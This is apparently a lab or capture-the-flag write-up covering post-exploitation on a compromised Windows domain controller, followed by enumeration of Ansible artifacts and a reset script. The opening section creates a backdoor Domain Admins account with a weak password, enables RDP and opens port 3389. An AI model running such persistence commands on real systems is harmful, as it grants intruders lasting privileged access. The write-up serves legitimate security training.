Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM user after [[Support_Privilege_Escalation#[RBCD (Resource-based Constrained Delegation) Attack](https //www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd)|compromising]] the target system.
c:\Windows\system32> net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
c:\Windows\system32> net group "Domain Admins" /ADD adm1n
The command completed successfully.Creating a DA user
c:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
c:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.Starting RDP server and opening up the corresponding port
It appears to be the Windows Server Core with no GUI
Management
The MANAGEMENT$ host is still unreachable
PS C:\Users\adm1n> ping -n 2 10.10.10.2
Pinging 10.10.10.2 with 32 bytes of data:
Reply from 10.10.10.2: bytes=32 time<1ms TTL=64
Reply from 10.10.10.2: bytes=32 time<1ms TTL=64
Ping statistics for 10.10.10.2:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0msHowever, the 10.10.10.2 host can still be reached
Ansible
ps c:\Users\Administrator> cat .\.ansible_async\472362125829.2344
{"output":[{"Type":"Container","PSChildName":"Security_2055936308","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell\\Resources\\Resource_1088764045\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell\\Resources\\Resource_1088764045\\Security\\Security_2055936308","Name":"Security_2055936308","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_1214545474","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell.workflow\\Resources\\Resource_1140488768\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell.workflow\\Resources\\Resource_1140488768\\Security\\Security_1214545474","Name":"Security_1214545474","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell.workflow"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_591915939","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell32\\Resources\\Resource_850232060\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell32\\Resources\\Resource_850232060\\Security\\Security_591915939","Name":"Security_591915939","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell32"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_1251586456","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.windows.servermanagerworkflows\\Resources\\Resource_166323501\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.windows.servermanagerworkflows\\Resources\\Resource_166323501\\Security\\Security_1251586456","Name":"Security_1251586456","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.windows.servermanagerworkflows"],"PSIsContainer":true},"WinRM service is already running on this machine.","WinRM is already set up for remote management on this computer."],"verbose":[],"results_file":"C:\\Users\\Administrator\\.ansible_async\\472362125829.2344","invocation":{"module_args":{"parameters":null,"removes":null,"depth":2,"executable":null,"chdir":null,"script":"Function Set-SessionConfig \n{ \n Param( [string]$user ) \n $account = New-Object Security.Principal.NTAccount $user \n $sid = $account.Translate([Security.Principal.SecurityIdentifier]).Value \n \n $config = Get-PSSessionConfiguration -Name \"Microsoft.PowerShell\" \n $existingSDDL = $Config.SecurityDescriptorSDDL \n \n $isContainer = $false \n $isDS = $false \n \n $SecurityDescriptor = New-Object -TypeName Security.AccessControl.CommonSecurityDescriptor -ArgumentList $isContainer,$isDS, $existingSDDL \n $accessType = \"Allow\" \n $accessMask = 268435456 \n $inheritanceFlags = \"none\" \n $propagationFlags = \"none\" \n \n $SecurityDescriptor.DiscretionaryAcl.AddAccess($accessType,$sid,$accessMask,$inheritanceFlags,$propagationFlags) \n $SecurityDescriptor.GetSddlForm(\"All\") \n} \n \n$user = \"SUPPORT\\Domain Users\" \n$newSDDL = Set-SessionConfig -user $user \n \nGet-PSSessionConfiguration | \nForEach-Object { \n Set-PSSessionConfiguration -name $_.name -SecurityDescriptorSddl $newSDDL -force \n} \n \nwinrm quickconfig -quiet \n","creates":null,"arguments":null,"error_action":"continue"}},"_ansible_suppress_tmpdir_delete":true,"host_out":"","debug":[],"ansible_job_id":"472362125829.2344","finished":1,"result":{},"changed":true,"information":[],"warning":[],"error":[],"host_err":"","started":1,"failed":false,"ansible_async_watchdog_pid":540}there is an ansible async file at c:\Users\Administrator\.ansible_async\472362125829.2344
This suggests that the target system was provision with Ansible
Scheduled Task
PS C:\Users\Administrator> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
Cleanup \ ReadyThere is a single scheduled task
PS C:\Users\Administrator> cmd /c schtasks /QUERY /TN \Cleanup /V /FO LIST
Folder: \
HostName: DC
TaskName: \Cleanup
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/21/2022 12:57:55 PM
Last Result: 267014
Author: SUPPORT\administrator
Task To Run: powershell.exe -File c:\users\administrator\documents\clean.ps1
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/Apowershell.exe -File c:\users\administrator\documents\clean.ps1
clean.ps1
ps c:\Users\Administrator> cat .\Documents\clean.ps1
import-module c:\Users\Administrator\Documents\PowerView.ps1
$computers = @{}
$last_msds = ""
$msds_count = 0
while($true) {
# get current msds-allowedtoactonbehalfofotheridentity
$DC = Get-DomainComputer DC
if ($DC.PSObject.Properties.Name -contains "msds-allowedtoactonbehalfofotheridentity") {
$RawBytes = $DC | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$SecurityID = $Descriptor.DiscretionaryAcl | select -expand SecurityIdentifier
if ($last_msds -eq $SecurityID) {
$msds_count += 1
} else {
$msds_count = 1
$last_msds = $SecurityID
}
} else {
$last_msds = ""
}
echo "msds: $last_msds [$msds_count]"
if ($msds_count -ge 5) {
Get-DomainComputer DC | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
}
# increment count for each active computer other than DC
$remove = @()
Get-DomainComputer | Where { $_.name -ne "DC" } | %{
$computers[$_.name] += 1
echo "Found $($_.name) [$($computers[$_.name])]"
}
# for any with count >= 5, remove
ForEach ($key in $computers.Keys) {
if ($computers[$key] -ge 2) {
echo "Removing $key."
remove-adcomputer $key -confirm:$false
$remove += $key
}
}
# cleanup hash table here since it doesn't like cleanup in loop
ForEach ($key in $remove) {
$computers.remove($key)
}
sleep 300
}